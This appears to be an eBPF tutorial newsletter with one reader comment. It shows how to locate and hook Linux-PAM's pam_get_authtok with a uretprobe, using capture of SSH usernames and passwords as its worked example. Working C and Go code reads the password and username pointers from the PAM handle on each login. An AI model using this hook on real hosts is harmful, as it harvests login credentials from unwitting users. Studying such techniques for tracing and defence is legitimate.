Challenges and Strategies in eBPF Uprobe Development

When it comes to eBPF development, the hardest part is moving forward from the code examples and tutorials you find on the web and designing something on your own.

In this newsletter, I want to help you up your game and become a well-rounded eBPF developer.

Today’s topic is uprobes (user space probes).

The focus will not be on understanding the code but rather on where and how to discover and attach uprobes in the application stack, which is tricky — believe me.

Let me show you.


Consider that we want to extract SSH usernames and passwords on each user login. This is potentially a malicious act but a good exercise for this demonstration.

The SSH daemon (sshd) relies on Linux PAM (Pluggable Authentication Modules), a suite of libraries that handle user authentication, so this should be our starting point.

We start by looking through its source code on GitHub as we're interested in finding a hook point or, I should say, a function that either handles the authentication or has access to the authentication parameters so we can extract them.

Traversing through the code and searching for specific symbols, one can find a pam_get_authtok function. This should trigger some interest.

We look further and find that the first argument of the function is a pam_handle_t struct that holds the user (username) and the authtok (password) parameters.

At this stage, we can only assume that this function is called on user login. To be sure, we can either spend more time in the source code or check it on a live system.

We can verify that our sshd actually uses this function by checking the libraries it loads and searching them for the function symbol. We start by finding the sshd PID (Process ID):

ps faux | grep sshd        
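Once the PID is known, the libraries mapped into the process can also be read from /proc/<PID>/maps. The following is a minimal Go sketch of that idea, not part of the original program: the helper name findMappedLib is hypothetical, and it assumes the usual maps layout in which the sixth whitespace-separated field is the file path (paths containing spaces are not handled).

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strings"
)

// findMappedLib scans the text of a /proc/<PID>/maps file and returns the
// path of the first file-backed mapping whose path contains libName.
func findMappedLib(maps, libName string) (string, bool) {
	scanner := bufio.NewScanner(strings.NewReader(maps))
	for scanner.Scan() {
		fields := strings.Fields(scanner.Text())
		// Anonymous mappings have only five fields; skip them.
		if len(fields) < 6 {
			continue
		}
		if strings.Contains(fields[5], libName) {
			return fields[5], true
		}
	}
	return "", false
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintln(os.Stderr, "usage: findlib <PID>")
		os.Exit(1)
	}
	data, err := os.ReadFile("/proc/" + os.Args[1] + "/maps")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	if path, ok := findMappedLib(string(data), "libpam"); ok {
		fmt.Println(path)
	} else {
		fmt.Println("libpam is not mapped into this process")
	}
}
```

Run it as root with the sshd PID as the only argument; the printed path is the one to hand to readelf.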

Using this information, we can list the symbol table of the library using the following command:

sudo readelf -s --wide /proc/<PID>/root/usr/lib/x86_64-linux-gnu/libpam.so.0 | grep pam_get_authtok        
💡 Note: Replace the <PID> placeholder with the sshd PID (the second column of the ps faux output; 597234 in our case).

We can see that the library does indeed have the pam_get_authtok function symbol. This is great so far — let's try to hook onto it.

As a first step, we will only print some dummy data to check whether the function is actually triggered.

Here's an MVP, starting with the kernel space program:

//go:build ignore
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>

char __license[] SEC("license") = "GPL";

SEC("uretprobe/pam_get_authtok")
int trace_pam_get_authtok(struct pt_regs *ctx) {
    bpf_printk("It's triggered - jeii!");
    return 0;
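}
💡 Note: A uretprobe is triggered when a function returns, whereas a uprobe is triggered on function entry. We hook the return here because the password should only be available in the handle once pam_get_authtok has done its work.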

And a User Space program:

package main

//go:generate go run github.com/cilium/ebpf/cmd/bpf2go -target amd64 guard guard.c

import (
	"bufio"
	"bytes"
	"fmt"
	"log"
	"os/exec"
	"strings"
	"time"

	"github.com/cilium/ebpf/link"
	"github.com/cilium/ebpf/rlimit"
)

const (
	defaultBinPath = "libpam.so.0"
	defaultSymbol  = "pam_get_authtok"
)

func findLibraryPath(libname string) (string, error) {
	cmd := exec.Command("sh", "-c", fmt.Sprintf("ldconfig -p | grep %s", libname))
	// Run the command and get the output
	var out bytes.Buffer
	cmd.Stdout = &out
	err := cmd.Run()
	if err != nil {
		return "", fmt.Errorf("failed to run ldconfig: %w", err)
	}

	// Read the first line of output which should have the library path
	scanner := bufio.NewScanner(&out)
	if scanner.Scan() {
		line := scanner.Text()
		// Extract the path from the ldconfig output
		if start := strings.LastIndex(line, ">"); start != -1 {
			path := strings.TrimSpace(line[start+1:])
			return path, nil
		}
	}
	return "", fmt.Errorf("library not found")
}

func main() {
	// Allow the current process to lock memory for eBPF resources.
	if err := rlimit.RemoveMemlock(); err != nil {
		log.Fatal(err)
	}
	// Load pre-compiled programs and maps into the kernel.
	objs := guardObjects{}
	if err := loadGuardObjects(&objs, nil); err != nil {
		log.Fatalf("loading objects: %s", err)
	}
	defer objs.Close()
	// Resolve the on-disk path of libpam before attaching to it.
	pamPath, err := findLibraryPath(defaultBinPath)
	if err != nil {
		log.Fatal(err)
	}
	log.Printf("LibPAM path: %s\n", pamPath)
	// Open an ELF binary and read its symbols.
	ex, err := link.OpenExecutable(pamPath)
	if err != nil {
		log.Fatalf("opening executable: %s", err)
	}
	// Attach the eBPF program as a uretprobe on the symbol.
	uretprobePam, err := ex.Uretprobe(defaultSymbol, objs.TracePamGetAuthtok, nil)
	if err != nil {
		log.Fatalf("creating uretprobe - %s: %s", defaultSymbol, err)
	}
	defer uretprobePam.Close()
	for {
		time.Sleep(1 * time.Second)
	}
}        

The kernel program just prints a message. The slightly trickier part is attaching the uretprobe to the libpam binary: we first need to find the path to the library itself and then use the link package from cilium/ebpf to attach our program to the symbol inside it.
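The path lookup can also be done without spawning a shell and grep. The sketch below is one possible variant, not the code from the final project: it runs ldconfig -p directly and matches the library name exactly, assuming each cache entry has the form "name (flags) => path". The helper name findInLdconfig is hypothetical.

```go
package main

import (
	"fmt"
	"log"
	"os/exec"
	"strings"
)

// findInLdconfig returns the path of the first `ldconfig -p` entry whose
// library name equals libname exactly.
func findInLdconfig(output, libname string) (string, bool) {
	for _, line := range strings.Split(output, "\n") {
		name, path, found := strings.Cut(line, "=>")
		if !found {
			continue // header line or empty line
		}
		fields := strings.Fields(name)
		if len(fields) == 0 || fields[0] != libname {
			continue
		}
		return strings.TrimSpace(path), true
	}
	return "", false
}

func main() {
	out, err := exec.Command("ldconfig", "-p").Output()
	if err != nil {
		log.Fatalf("running ldconfig: %v", err)
	}
	path, ok := findInLdconfig(string(out), "libpam.so.0")
	if !ok {
		log.Fatal("libpam.so.0 not found in the linker cache")
	}
	fmt.Println(path)
}
```

On a multi-architecture system the cache may list several entries for the same name, so the first match is not necessarily the one sshd loads; comparing it with the path seen under /proc/<PID> is a reasonable sanity check.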

By running this program, we can see that our program was indeed triggered by printing eBPF traces:

sudo bpftool prog tracelog

This is good: we are on the right path. Now it's just a matter of working out what we need to read from the registers to get the username and password.

The first argument of pam_get_authtok is a pointer to the pam_handle_t struct. We can copy the struct definition from the source into our code and use the bpf_probe_read helper (or bpf_probe_read_user on newer kernels) to extract the fields we care about, namely authtok and user. In other words, we modify our kernel code as follows:

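//go:build ignore
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h> // provides PT_REGS_PARM1

char __license[] SEC("license") = "GPL";

// Leading fields of struct pam_handle, copied from Linux-PAM's
// libpam/pam_private.h. Assumption: the layout matches the libpam version
// installed on the target host; check it against that version's source.
typedef struct pam_handle {
    char *authtok;
    unsigned caller_is;
    void *pam_conversation;
    char *oldauthtok;
    char *prompt;
    char *service_name;
    char *user;
} pam_handle_t;

SEC("uretprobe/pam_get_authtok")
int trace_pam_get_authtok(struct pt_regs *ctx) {
    bpf_printk("It's triggered - jeii!");

    // Caveat: at function return the first-argument register is not
    // guaranteed to still hold the original argument.
    pam_handle_t *phandle = (pam_handle_t *)PT_REGS_PARM1(ctx);
    if (!phandle) {
        return 0;
    }

    u32 pid = bpf_get_current_pid_tgid() >> 32;

    // Read the pointers to the password and username strings. This uses
    // the user-space variant of bpf_probe_read.
    u64 password_addr = 0;
    bpf_probe_read_user(&password_addr, sizeof(password_addr), &phandle->authtok);

    u64 username_addr = 0;
    bpf_probe_read_user(&username_addr, sizeof(username_addr), &phandle->user);

    return 0;
}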

At this point we hold the addresses of the username and password strings, so technically we have what we wanted. Reading the strings themselves is one more probe read away.

💡 Note: This example only covers username and password authentication, but we could technically expand this to also cover authentication using SSH public and private keys.

To wrap this up, in the final code, I’ve also added the eBPF Ring Buffer Map to forward the extracted data to user space. You can find the complete code on my GitHub.


We have come to the end of this week's newsletter. To be honest, the hardest part of developing uprobe eBPF programs is finding the right hook points and understanding the library source code. It's also important to verify, using ps and readelf, that the application actually loads the library and that the library exposes the function we plan to track. If you're looking for a hook point inside your own application or library, all of this is more straightforward, because you already know the code.

I hope you find this resource as enlightening as I did. Stay tuned for more exciting developments and updates in the world of eBPF in next week's newsletter.

Until then, keep 🐝-ing!

Warm regards, Teodor

Jameel Kaisar

SDE @Amazon | Ex BrowserStack, Zeta, Wikipedia, BARC | Open Source Contributor

11mo

Very tricky indeed! Identifying the right function and structs requires a deep dive into the codebase. eBPF uprobes can be quite challenging, especially when some function parameters are passed via stack rather than the registers.
